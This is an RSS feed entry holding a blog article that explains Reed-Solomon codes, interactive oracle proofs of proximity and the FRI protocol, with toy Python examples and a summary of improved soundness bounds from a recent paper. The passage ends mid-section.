<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
    <channel>
      <title>LambdaClass Blog</title>
      <link>https://lambdaclass.github.io/lambdaclass_blog</link>
      <description>Deep technical insights on cryptography, distributed systems, zero-knowledge proofs, and cutting-edge software engineering from the LambdaClass team.</description>
      <generator>Zola</generator>
      <language>en</language>
      <atom:link href="https://lambdaclass.github.io/lambdaclass_blog/rss.xml" rel="self" type="application/rss+xml"/>
      <lastBuildDate>Fri, 16 Jan 2026 00:00:00 +0000</lastBuildDate>
      <item>
          <title>A Sharper Look at FRI</title>
          <pubDate>Fri, 16 Jan 2026 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/a-sharper-look-at-fri/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/a-sharper-look-at-fri/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/a-sharper-look-at-fri/">&lt;h1 id=&quot;a-sharper-look-at-fri&quot;&gt;A sharper look at FRI&lt;&#x2F;h1&gt;
&lt;p&gt;In this article, we review recent developments in the analysis of the cryptographic security of one of the biggest pieces of the ZK engine: the FRI protocol, which implements interactive oracle proofs of proximity (IOPPs). A newly uploaded article by Eli Ben-Sasson, Dan Carmon, Swastik Kopparty, and Shubhangi Saraf, alongside Ulrich Habock (BCHKS25), revisits the foundational 2020 paper “Proximity Gaps for Reed-Solomon Codes” (BCIKS20), in which the soundness of the RS-IOPP was established using the Correlated Agreement Theorem. Through a more detailed and sharper use of linear algebra in the list-decoding regime, the authors obtain improved security bounds for standard FRI. Here, we revisit the protocol conceptually and outline how their improvement was achieved.&lt;&#x2F;p&gt;
&lt;p&gt;The acquainted reader may skip directly to section 4, while newcomers are encouraged to read the first sections to get familiar with notations and concepts involved.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;1-basic-reed-solomon-landscape&quot;&gt;1. Basic Reed-Solomon landscape&lt;&#x2F;h2&gt;
&lt;p&gt;Let us begin with an overview of one of the basics of code-based cryptography: an interactive instance of information exchange between a Prover (P) and a Verifier (V) - where P wants to convince V that he has executed a certain task or possesses certain information. Usually, the information P claims to possess is, in fact, the result of a computation, in the form of a low-degree polynomial f, say $\deg(f) &amp;lt; k$ with coefficients in a suitable finite field $\mathbb{F}_q$ of $q$ elements.&lt;&#x2F;p&gt;
&lt;p&gt;A completely naive approach would be for the Prover to send the list of coefficients of the polynomial he claims to possess or, equivalently, a list of $\deg(f)+1 \leq k$ evaluations, since a polynomial of degree less than $k$ is uniquely determined by $k$ evaluations (Lagrange interpolation). It is clear that such an idea is inefficient, since we would have to communicate a lot of information through a channel - and it exposes $f$ entirely.&lt;&#x2F;p&gt;
&lt;p&gt;One of the ideas to circumvent the exposure of $f$ is to evaluate $f$ at a much larger set of points $\mathcal{D}$, with $n = |\mathcal{D}| \gg k$, in the base field $\mathbb{F}_q$, so that what the Prover and Verifier exchange are much longer lists of evaluations.&lt;&#x2F;p&gt;
&lt;p&gt;The effect that this has is that any attacker will be faced with the challenge of distinguishing between lists of numbers corresponding to evaluations of low-degree polynomials and lists that do not come from evaluating such polynomials.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Reed-Solomon Code:&lt;&#x2F;strong&gt; This is the very basic idea of a Reed-Solomon code $RS[q,n,k]$: length $n$ vectors consisting exactly of the evaluation of polynomials of degree bounded by $k$ over a domain $\mathcal{D} \subset \mathbb{F}_q$.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;As a subset of the ambient vector space $\mathbb{F}_q^n$, the Reed-Solomon code is a vector subspace since the evaluation of polynomials is a linear operation, and as such it is a prime example of a &lt;em&gt;linear code&lt;&#x2F;em&gt;. This means that the coordinate-wise addition of codewords is again a codeword, and pointwise multiplication of codewords by elements of the field is again a codeword. Not all codes are linear.&lt;&#x2F;p&gt;
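&lt;p&gt;Linearity is easy to see in miniature. The following toy snippet (an illustrative sketch over the small field $\mathbb{F}_{17}$, with made-up polynomials) checks that the coordinate-wise sum of two Reed-Solomon codewords is the codeword of the summed polynomials:&lt;&#x2F;p&gt;

```python
# Linearity of Reed-Solomon codes in miniature: the coordinate-wise sum of
# two codewords is the codeword of the summed polynomials. Toy field F_17.
P = 17
domain = list(range(8))                   # evaluation domain D, n = 8

def encode(coeffs):
    """Evaluate the polynomial with the given coefficients over the domain D."""
    return [sum(c * pow(x, i, P) for i, c in enumerate(coeffs)) % P
            for x in domain]

f = [3, 1, 4]                             # 3 + X + 4X^2
g = [2, 7, 5]                             # 2 + 7X + 5X^2
sum_of_words = [(a + b) % P for a, b in zip(encode(f), encode(g))]
word_of_sum = encode([(a + b) % P for a, b in zip(f, g)])
print(sum_of_words == word_of_sum)        # True: RS codes are linear
```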
&lt;p&gt;For a general code $\mathcal{C}$ defined over a finite field $\mathbb{F}_q$ with block length $n$, and for any two words $\mathbf{u}, \mathbf{v} \in \mathbb{F}_q^n$, the “absolute” Hamming distance $d(\mathbf{u}, \mathbf{v})$ is defined as the number of positions where the corresponding symbols differ:&lt;&#x2F;p&gt;
&lt;p&gt;$$d(\mathbf{u}, \mathbf{v}) = \left| \{ i \in \{1, \dots, n\} : u_i \neq v_i \} \right|$$&lt;&#x2F;p&gt;
&lt;p&gt;and typically one works with a fractional version of $d$ which takes into account the blocklength:&lt;&#x2F;p&gt;
&lt;p&gt;$$\Delta(\mathbf{u}, \mathbf{v}) = \frac{d(\mathbf{u}, \mathbf{v})}{n}$$&lt;&#x2F;p&gt;
&lt;p&gt;This allows the &lt;strong&gt;interpretation of the distance as the fraction of entries in which two codewords differ&lt;&#x2F;strong&gt;. Finally, we recall the notion of the rate of a code of dimension $k$ and blocklength $n$ as the ratio:&lt;&#x2F;p&gt;
&lt;p&gt;$$\rho = \frac{k}{n}$$&lt;&#x2F;p&gt;
&lt;p&gt;This number can be interpreted in a few ways, namely as a measure of &lt;strong&gt;information content:&lt;&#x2F;strong&gt; a fraction $\rho$ of the transmitted symbols carries the actual information of the message. The &lt;strong&gt;redundancy&lt;&#x2F;strong&gt; is the remaining fraction $(1-\rho)$ of the message and is the resource consumed to provide error-correction capabilities (more on this soon). A lower rate implies higher redundancy and, in principle, higher resilience to noise, at the cost of throughput.&lt;&#x2F;p&gt;
&lt;p&gt;An important concept in coding theory is that of a list around a word $w$: for $w \in \mathbb{F}_q^n$ and $\delta &amp;gt; 0$, it is the set&lt;&#x2F;p&gt;
&lt;p&gt;$$List[w, \mathcal{C}, \delta]$$&lt;&#x2F;p&gt;
&lt;p&gt;and this is comprised of the codewords of $\mathcal{C}$ that have distance at most $\delta$ from the word $w$. An associated question is, given $w$, to determine how many elements this list has in terms of $\delta$. For sufficiently small $\delta$, the list around $w$ has at most one element, and in this sense we say that $w$ can be “corrected” to the corresponding $u \in \mathcal{C}$; this is the usual information-theoretic view of the goodness of the code. In those circumstances, we say we are within the “unique decoding regime”. For Reed-Solomon codes, this bound for $\delta$ can be given in terms of the rate of the code, and the regime is characterized by&lt;&#x2F;p&gt;
&lt;p&gt;$$\delta &amp;lt; \frac{1-\rho}{2}$$&lt;&#x2F;p&gt;
&lt;p&gt;However, this can sometimes be too restrictive when implementing efficient, fast code-based algorithms, and we will be willing to admit a list of candidate codewords sufficiently close to the received word $w$, rather than a single codeword. At these times, we will be working in the “list decoding regime”, and &lt;strong&gt;it is crucial for lists $\mathcal{L}$ around $w$ not to have too many elements.&lt;&#x2F;strong&gt; For that matter, there is a bound on $\delta$, usually called the Johnson bound, below which the number of elements in a list $\mathcal{L}$ is polynomially bounded. The Johnson bound is valid for any code and is obtained by combinatorial and geometric arguments.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Johnson Bound for Reed-Solomon Codes:&lt;&#x2F;strong&gt; Specifically for Reed-Solomon codes, it can be given in terms of the rate, and the list decoding regime is characterized as&lt;&#x2F;p&gt;
&lt;p&gt;$$\delta &amp;lt; 1 - \sqrt{\rho} = J$$&lt;&#x2F;p&gt;
&lt;p&gt;and a standard upper bound for the list size $\mathcal{L}$ is:&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathcal{L} \le \frac{1 - \delta}{(1 - \delta)^2 - \rho}$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Sometimes, this list size is expressed as the distance between the operating proximity parameter $\delta$ and the actual Johnson bound; typically, this is called the “safety gap” $\eta$. Naturally $\eta = J - \delta = 1 - \sqrt{\rho} - \delta$ and then&lt;&#x2F;p&gt;
&lt;p&gt;$$\delta = (1 - \sqrt{\rho}) - \eta \quad \implies \quad 1 - \delta = \sqrt{\rho} + \eta$$&lt;&#x2F;p&gt;
&lt;p&gt;This translates as&lt;&#x2F;p&gt;
&lt;p&gt;$$\mathcal{L} \le \frac{\sqrt{\rho} + \eta}{2\eta\sqrt{\rho} + \eta^2} \approx \frac{\sqrt{\rho}}{2\eta\sqrt{\rho}} = \frac{1}{2\eta}$$&lt;&#x2F;p&gt;
&lt;p&gt;The dependency $\mathcal{L} = O(1&#x2F;\eta)$ often cited in FRI literature is simply the asymptotic behavior of the exact discriminant bound $\frac{1-\delta}{(1-\delta)^2 - \rho}$ as the proximity parameter approaches the Johnson bound.&lt;&#x2F;p&gt;
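&lt;p&gt;To make these quantities concrete, here is a small numeric sketch (a hypothetical illustration, not taken from the paper) that evaluates the unique-decoding radius, the Johnson bound, and the list-size bound for a rate typical of FRI deployments:&lt;&#x2F;p&gt;

```python
# Numeric sketch of the decoding regimes for a Reed-Solomon code of rate rho.
# Assumed parameters: rho = 1/8 (a common FRI rate), eta = 0.01 (safety gap).
import math

rho = 0.125
unique_radius = (1 - rho) / 2        # unique decoding: delta below (1 - rho)/2
johnson = 1 - math.sqrt(rho)         # list decoding: delta below 1 - sqrt(rho)

def list_size_bound(delta, rho):
    # Johnson-style bound: (1 - delta) / ((1 - delta)**2 - rho)
    return (1 - delta) / ((1 - delta) ** 2 - rho)

eta = 0.01                           # distance from delta to the Johnson bound
delta = johnson - eta
exact = list_size_bound(delta, rho)
approx = 1 / (2 * eta)               # the O(1/eta) asymptotic list size

print(f"unique radius = {unique_radius:.4f}, Johnson bound = {johnson:.4f}")
print(f"list-size bound = {exact:.2f}, 1/(2*eta) = {approx:.2f}")
```

&lt;p&gt;For these assumed values, the exact discriminant bound and the $\frac{1}{2\eta}$ approximation are already within a few percent of each other.&lt;&#x2F;p&gt;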
&lt;h2 id=&quot;2-what-is-an-iopp&quot;&gt;2. What is an IOPP&lt;&#x2F;h2&gt;
&lt;p&gt;Going back to the problem of the Prover (P) and Verifier (V) exchanging information, let’s see how to set up that stage. Actually, it would be nice to start by spelling out what IOPP actually stands for: Interactive Oracle Proofs of Proximity. We’ll contextualize each of these terms in this itemized section:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Obviously, &lt;strong&gt;Interactive&lt;&#x2F;strong&gt; stands for the notion of prover and verifier interacting with each other, exchanging information.&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;
&lt;p&gt;Now comes the sketchy part: in these contexts, the Verifier ($V$) lacks the computational resources to read the entire Prover’s ($P$) message; it is restricted to opening, a limited number of times, a small portion of the data produced by the Prover. Technically, the Verifier has what is called &lt;strong&gt;Oracle&lt;&#x2F;strong&gt; access: $P$ commits to a function $f: D \to \mathbb{F}$ and $V$ accesses $f$ essentially as a black-box oracle: $V$ selects an index $x \in D$, and the oracle responds with $f(x)$.&lt;&#x2F;p&gt;
&lt;p&gt;In practice, this is achieved via &lt;em&gt;Merkle Trees&lt;&#x2F;em&gt;. The commitment is the Merkle Root. An oracle query response consists of the value $f(x)$ and the Merkle authentication path.&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;
&lt;p&gt;The use of &lt;strong&gt;Proofs of Proximity&lt;&#x2F;strong&gt; rather than strict membership is both a theoretical necessity in succinct proofs and a response to a practical limitation, because &lt;strong&gt;to verify strict membership (that a vector is &lt;em&gt;exactly&lt;&#x2F;em&gt; a codeword), the verifier must read the entire input, and this requires linear time $\Omega(n)$.&lt;&#x2F;strong&gt; In order to break free from this limitation, the idea is not to test word-membership in the code, but rather that a word is &lt;strong&gt;$\delta$-close&lt;&#x2F;strong&gt; to the code. Within the FRI protocol, this property can be checked with high probability using only a logarithmic number of queries.&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Let us emphasize these facts again:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key Insight:&lt;&#x2F;strong&gt; In order to make an IOPP protocol feasible in practice, we relax the condition of membership $f \in \mathcal{C}$ to a condition of proximity $\Delta(f, \mathcal{C}) &amp;lt; \delta$ by allowing a positive distance $\delta &amp;gt; 0$: this allows a sublinear number of queries (sublinear in the blocklength $n$), since now the Verifier does not have to read the whole message. At the same time, for security reasons, we do not allow a $\delta$ that is way too big: if a malicious Prover (P) wants to get away with a false statement $f$, we want to make those chances as slim as possible. For that reason, we demand that $\delta$ be bounded by a meaningful constant, say, the Johnson bound.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
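&lt;p&gt;To ground the oracle-access idea, here is a minimal, illustrative Merkle commitment in Python (a toy sketch only: real FRI implementations add padding, salting, domain separation, and batched openings):&lt;&#x2F;p&gt;

```python
# A minimal sketch of oracle access via a Merkle tree (illustrative only).
import hashlib

def H(data):
    return hashlib.sha256(data).digest()

def merkle_layers(leaves):
    """Build all layers; layers[0] are hashed leaves, layers[-1][0] is the root."""
    layer = [H(x) for x in leaves]
    layers = [layer]
    while len(layer) > 1:
        layer = [H(layer[i] + layer[i + 1]) for i in range(0, len(layer), 2)]
        layers.append(layer)
    return layers

def open_at(layers, idx):
    """Authentication path for leaf idx: one sibling hash per layer."""
    path = []
    for layer in layers[:-1]:
        path.append(layer[idx ^ 1])   # sibling index flips the low bit
        idx //= 2
    return path

def verify(root, leaf, idx, path):
    node = H(leaf)
    for sibling in path:
        node = H(node + sibling) if idx % 2 == 0 else H(sibling + node)
        idx //= 2
    return node == root

# Prover commits to evaluations of f over the domain (8 leaves here).
evals = [str(v).encode() for v in [3, 1, 4, 1, 5, 9, 2, 6]]
layers = merkle_layers(evals)
root = layers[-1][0]                  # the Merkle root is the "oracle" commitment
# Verifier queries position 5; the response is the value plus its path.
path = open_at(layers, 5)
print(verify(root, evals[5], 5, path))  # True
```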
&lt;h2 id=&quot;3-how-fri-works&quot;&gt;3. How FRI works&lt;&#x2F;h2&gt;
&lt;p&gt;FRI stands for Fast Reed-Solomon Interactive Oracle Proof of Proximity, a shortened version of RS-IOPP. It is an IOPP protocol adjusted for Reed-Solomon codes. It consists of two distinct phases: the COMMIT phase and the VERIFY phase. Most of the optimization and the Prover’s work occurs during the COMMIT phase, while the bulk of the Verifier’s work occurs during the VERIFY phase. We proceed to briefly discuss each of these phases.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;3-1-the-commit-phase&quot;&gt;3.1 The COMMIT phase&lt;&#x2F;h3&gt;
&lt;p&gt;In this phase, the Prover wants to prove that he possesses a codeword in $\mathcal{C}_0 = RS[q,n,k]$, where the evaluation domain $\mathcal{D}_0$ is agreed beforehand. Conceptually, after the $i$-th round of interaction with the Verifier, the Prover produces a codeword $f_i$ belonging to a smaller Reed-Solomon code $C_i$. This results in a sequence of codewords $f_1, f_2, \ldots, f_r$ belonging to an adequate sequence of Reed-Solomon codes $C_i = RS[q, n_i, k_i]$ such that if $n = n_0$ and $k = k_0$, then for $0 \leq i \leq r$:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;the evaluation domains are nested: $\mathcal{D}_{i+1} \subset \mathcal{D}_i$, and their sizes are uniformly related: this means that we have a relation of the form $n_i = a \cdot n_{i+1}$, where the constant $a$ is known as the &lt;em&gt;folding constant&lt;&#x2F;em&gt;. Typically, $a = 2, 4$ or $8$. In this exposition, we’ll stick to the case $a = 2$ for simplicity.&lt;&#x2F;li&gt;
&lt;li&gt;the rate of the code remains unchanged at each step: $\frac{k_i}{n_i} = \rho$.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;&#x2F;strong&gt; The FRI protocol is usually instantiated for fields of characteristic $&amp;gt; 2$, and blocksize $n_0$ being a power of $2$ such that $\mathcal{D}_0$ is indeed the collection of $n_0$-th roots of unity. Also, the code dimension is chosen to be a power of two.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;A brief description of the COMMIT phase goes as follows:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Initialization:&lt;&#x2F;strong&gt; An honest Prover $P$ commits to the initial codeword $f_0$ (via a Merkle Root).&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Interaction Loop ($i = 0$ to $r-1$):&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;The verifier $V$ sends a random challenge $\alpha_i \in \mathbb{F}$.&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;
&lt;p&gt;The $P$ now proceeds to construct a new word in a “smaller” Reed-Solomon code $\mathcal{C}_{i+1}$ over the new domain $D_{i+1} = \{x^2 : x \in D_i\}$, which is a subset of the previous domain and contains half the points. The rationale behind this is that for a polynomial $f_i$ with $\deg(f_i) &amp;lt; k_i$, one can write $f_i$ as the sum of a polynomial containing all the even powers and a polynomial containing all the odd powers. This amounts to the guaranteed existence of two polynomials $g_i$ and $h_i$, both having degree $&amp;lt; \frac{k_i}{2}$, such that&lt;&#x2F;p&gt;
&lt;p&gt;$$f_i(X) = g_i(X^2) + X h_i(X^2)$$&lt;&#x2F;p&gt;
&lt;p&gt;One of the good things about this decomposition is that both $g_i$ and $h_i$ evaluated at $x^2$ are linearly related to $f_i$ evaluated at $x$ and $-x$:&lt;&#x2F;p&gt;
&lt;p&gt;$$g_i(x^2) = \frac{f_i(x) + f_i(-x)}{2} \quad \text{and} \quad h_i(x^2) = \frac{f_i(x) - f_i(-x)}{2x}$$&lt;&#x2F;p&gt;
&lt;p&gt;and so the Prover is now able to define a new Reed-Solomon codeword for $z \in D_{i+1}$ by&lt;&#x2F;p&gt;
&lt;p&gt;$$f_{i+1}(z) = g_i(z) + \alpha_i h_i(z)$$&lt;&#x2F;p&gt;
&lt;p&gt;belonging to $C_{i+1} = RS[q, \frac{n_i}{2}, \frac{k_i}{2}]$. $P$ computes and commits to this new word and sends the new Merkle root to V.&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Termination:&lt;&#x2F;strong&gt; The process stops when the degree is small (e.g., constant). $P$ sends the final value directly.&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;The reader acquainted with the classical Fast Fourier Transform algorithm will find these last few lines very familiar.&lt;&#x2F;p&gt;
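&lt;p&gt;The split-and-fold step above can be sketched numerically. The following toy example (hypothetical parameters over $\mathbb{F}_{97}$, far too small to be secure) checks the even&#x2F;odd decomposition identities for one folding round:&lt;&#x2F;p&gt;

```python
# One FRI folding round over a small prime field (toy parameters, not secure).
# We check the identity f_{i+1}(x^2) = g_i(x^2) + alpha * h_i(x^2) on every
# nonzero point of the field.
P = 97                                   # field F_97 (toy choice)

def poly_eval(coeffs, x):
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc

f = [5, 2, 7, 3]                         # f(X) = 5 + 2X + 7X^2 + 3X^3
g = f[0::2]                              # even coefficients: g(Y) = 5 + 7Y
h = f[1::2]                              # odd  coefficients: h(Y) = 2 + 3Y
alpha = 11                               # verifier's random challenge
folded = [(a + alpha * b) % P for a, b in zip(g, h)]   # g + alpha * h

inv2 = pow(2, P - 2, P)                  # 1/2 in F_97 (Fermat inverse)
for x in range(1, P):
    fx, fmx = poly_eval(f, x), poly_eval(f, P - x)     # f(x), f(-x)
    gx2 = (fx + fmx) * inv2 % P                        # g(x^2)
    hx2 = (fx - fmx) * inv2 * pow(x, P - 2, P) % P     # h(x^2)
    assert poly_eval(folded, x * x % P) == (gx2 + alpha * hx2) % P
print("folding identity holds on all nonzero points")
```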
&lt;h3 id=&quot;3-2-the-verify-phase&quot;&gt;3.2 The VERIFY phase&lt;&#x2F;h3&gt;
&lt;p&gt;We’re now ready to describe the VERIFY phase of the protocol: $V$ verifies that the committed functions satisfy the recurrence relation defined by the challenges $\alpha_i$.&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Sampling:&lt;&#x2F;strong&gt; $V$ samples a random point $z$ from the initial domain $D_0$.&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Consistency Check:&lt;&#x2F;strong&gt; For each layer $i$:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$V$ queries the oracle for $f_i(z)$ and $f_i(-z)$ (symmetric points in domain $D_i$).&lt;&#x2F;li&gt;
&lt;li&gt;$V$ queries the oracle for $f_{i+1}(z^2)$ in the next domain $D_{i+1}$.&lt;&#x2F;li&gt;
&lt;li&gt;$V$ verifies the collinearity equation:
$$f_{i+1}(z^2) \stackrel{?}{=} g_i(z^2) + \alpha_i \cdot h_i(z^2)$$
where $g_i(z^2)$ and $h_i(z^2)$ are computed from the queried values $f_i(z)$ and $f_i(-z)$ via the identities above.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
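&lt;p&gt;Putting both phases together, a toy end-to-end run (again with hypothetical, insecure parameters: plain lists stand in for Merkle-committed oracles, and a single query point is checked) looks like this:&lt;&#x2F;p&gt;

```python
# A toy end-to-end FRI-style check. Real deployments use large fields,
# Merkle commitments, Fiat-Shamir challenges, and many query points.
import random
P = 97

def poly_eval(coeffs, x):
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc

def fold(coeffs, alpha):
    g, h = coeffs[0::2], coeffs[1::2]
    return [(a + alpha * b) % P for a, b in zip(g, h)]

# COMMIT phase: fold a degree-7 polynomial down to a constant.
layers = [[9, 1, 2, 8, 5, 3, 7, 4]]      # coefficients of f_0
alphas = []
while len(layers[-1]) > 1:
    alpha = random.randrange(P)          # verifier challenge per round
    alphas.append(alpha)
    layers.append(fold(layers[-1], alpha))

# VERIFY phase: spot-check the recurrence at a random z, layer by layer.
inv2 = pow(2, P - 2, P)
z = random.randrange(1, P)
ok = True
for i, alpha in enumerate(alphas):
    fz  = poly_eval(layers[i], z)
    fmz = poly_eval(layers[i], P - z)    # f_i(-z)
    gz2 = (fz + fmz) * inv2 % P
    hz2 = (fz - fmz) * inv2 * pow(z, P - 2, P) % P
    z = z * z % P                        # move to the next domain D_{i+1}
    ok = ok and poly_eval(layers[i + 1], z) == (gz2 + alpha * hz2) % P
print("all layer checks passed:", ok)
```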
&lt;p&gt;This description leads to the article’s central question: how safe is this gadget?&lt;&#x2F;p&gt;
&lt;h2 id=&quot;4-an-improved-soundness-analysis-of-fri-as-an-iopp-instantiation&quot;&gt;4. An improved soundness analysis of FRI as an IOPP instantiation&lt;&#x2F;h2&gt;
&lt;p&gt;Here is where the novelty of the recent work, BCHKS25, improves the soundness analysis of the FRI protocol done in BCIKS20. In the foundational article “Proximity Gaps for Reed-Solomon codes,” the authors proved a fundamental result (the Correlated Agreement Theorem), from which the soundness of the FRI protocol follows. In their most recent paper, a detailed analysis of a linear-algebraic fact is used to obtain tighter bounds on the soundness of the protocol, enabling its implementation in a wider setting. Before diving into the mathematics involved, we need to define the concept of $\delta$-soundness, which establishes and fine-tunes the protocol’s security.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Soundness Definition:&lt;&#x2F;strong&gt; In order to define what it means for an IOPP to have soundness with parameters $(\delta, \epsilon)$, we will simply take the simplest route first: the probability of the Verifier accepting a forged proof $f^*$ should be as small as possible. In terms of distance to a code, let us re-phrase the previous sentence as: the probability of the Verifier accepting a word $f^*$ which is $\delta$-far should be less than $\epsilon$.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Mathematically, let $\mathcal{C} \subseteq \mathbb{F}_q^n$ be a Reed-Solomon code. Let $P^*$ be any (potentially malicious) prover strategy that outputs an oracle function $f^*: D \to \mathbb{F}$.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Definition:&lt;&#x2F;strong&gt; The FRI protocol is said to have &lt;strong&gt;soundness error $\epsilon$ for proximity parameter $\delta$&lt;&#x2F;strong&gt; if the following implication holds:&lt;&#x2F;p&gt;
&lt;p&gt;$$\text{If } \min_{c \in \mathcal{C}} \Delta(f^*, c) &amp;gt; \delta \quad \implies \quad \Pr\left[ V^{f^*} \text{ accepts} \right] \le \epsilon$$&lt;&#x2F;p&gt;
&lt;p&gt;Where $\Delta(\cdot, \cdot)$ denotes the relative Hamming distance.&lt;&#x2F;p&gt;
&lt;p&gt;From the definition of $(\delta, \epsilon)$-soundness of the IOPP, one can define the security level $\lambda$ (in bits) of the protocol. It relates to the soundness error $\epsilon$ of the protocol, defined as the probability that a Verifier accepts a proof for an invalid statement (i.e., a word that is $\delta$-far from the code).&lt;&#x2F;p&gt;
&lt;p&gt;$$\epsilon \le 2^{-\lambda} \iff \lambda = -\log_2(\epsilon)$$&lt;&#x2F;p&gt;
&lt;p&gt;Now the nature of the soundness error can also be characterized in a colloquial manner: the acceptance of a forged codeword could be the result of two combined effects&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;A dishonest Prover getting lucky by proposing a forged word $f^*$ which is $\delta$-far from the code and gets closer to the code at each folding step: this is typically named the “folding error” or “commit error”, $\epsilon_{commit}$, since it happens during the COMMIT phase.&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;
&lt;p&gt;A Verifier being unlucky and spot-checking at places where a forged word $f^*$ actually coincides with a valid codeword: this error usually goes by the name of “query error”, $\epsilon_{query}$.&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;The total soundness error is composed of errors from the two main phases:&lt;&#x2F;p&gt;
&lt;p&gt;$$\epsilon_{\text{total}} \le \epsilon_{\text{commit}} + \epsilon_{\text{query}}$$&lt;&#x2F;p&gt;
&lt;p&gt;Particularly, the commit error is of relevance because it speaks to a structural feature of the whole FRI gadget: we need to know that a dishonest Prover has very little chance of getting away with a forged proof - in terms of vicinity, the chances of a forged word becoming closer to the code at each folding step must be negligible. And here is where the celebrated Correlated Agreement Theorem comes in: it states that &lt;strong&gt;whenever a folding of two words is sufficiently close to a Reed-Solomon code, it must be because the words being folded themselves have very high agreement with valid Reed-Solomon codewords; that is, they are close to the Reed-Solomon code to begin with.&lt;&#x2F;strong&gt; This rules out the possibility of “fabricating valid words from invalid ones”.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;5-what-changed&quot;&gt;5. What changed?&lt;&#x2F;h2&gt;
&lt;p&gt;In the classic analysis presented in BCIKS20, the soundness error is derived using a union bound over the $r$ rounds of folding, and the expression obtained by the authors was roughly:&lt;&#x2F;p&gt;
&lt;p&gt;$$\epsilon_{\text{classic}} \approx \underbrace{\frac{n^2}{q}}_{\text{Commit Error}} + \underbrace{(1 - \delta)^l}_{\text{Query Error}}$$&lt;&#x2F;p&gt;
&lt;p&gt;where $l$ was the number of queries, $n$ the block size and $q$ the number of elements in the field. The immediate implications were that in order to achieve, say $\lambda = 100$ bits of security, one required $\frac{n^2}{q} &amp;lt; 2^{-100}$. This forced $q \approx n^2 \cdot 2^{100}$, prohibiting the use of small fields (like 64-bit fields) for large $n$. Also, the bits of security from the query phase scale linearly with $l$:&lt;&#x2F;p&gt;
&lt;p&gt;$$\lambda_{\text{query}} \approx l \cdot \log_2\left(\frac{1}{1-\delta}\right)$$&lt;&#x2F;p&gt;
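&lt;p&gt;As a quick sanity check of this scaling (with illustrative, assumed numbers), one can tabulate the query-phase security for a rate and proximity parameter of the kind discussed above:&lt;&#x2F;p&gt;

```python
# Query-phase security bits: lambda_query ~ l * log2(1 / (1 - delta)).
# Assumed parameters: rho = 1/8, delta slightly below the Johnson bound.
import math

rho = 0.125
delta = (1 - math.sqrt(rho)) - 0.05      # proximity parameter, gap eta = 0.05
bits_per_query = math.log2(1 / (1 - delta))
for l in [20, 40, 80]:
    print(f"l = {l:3d} queries -> ~{l * bits_per_query:.1f} bits of security")
```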
&lt;p&gt;In their recent article, Ben-Sasson et al. revisited the original proof and refined the use of a linear-algebra argument in the application of the Guruswami-Sudan decoder, achieving tighter and better bounds for this error. The refined error bound is approximately:&lt;&#x2F;p&gt;
&lt;p&gt;$$\epsilon_{\text{modern}} \approx \underbrace{\frac{n}{q}}_{\text{Commit Error (Linear)}} + \underbrace{C \cdot (1 - \delta)^l}_{\text{Query Error}}$$&lt;&#x2F;p&gt;
&lt;p&gt;(where $C$ is a small constant related to the list size, often close to 1 in practice). The key improvement can be seen directly from their estimate: going from $|S| \approx n^2$ to $|S| \approx n$ fundamentally changes the requirements for the field size $q$ in the Commit Phase soundness error $\epsilon = |S|&#x2F;q$.&lt;&#x2F;p&gt;
&lt;ul&gt;
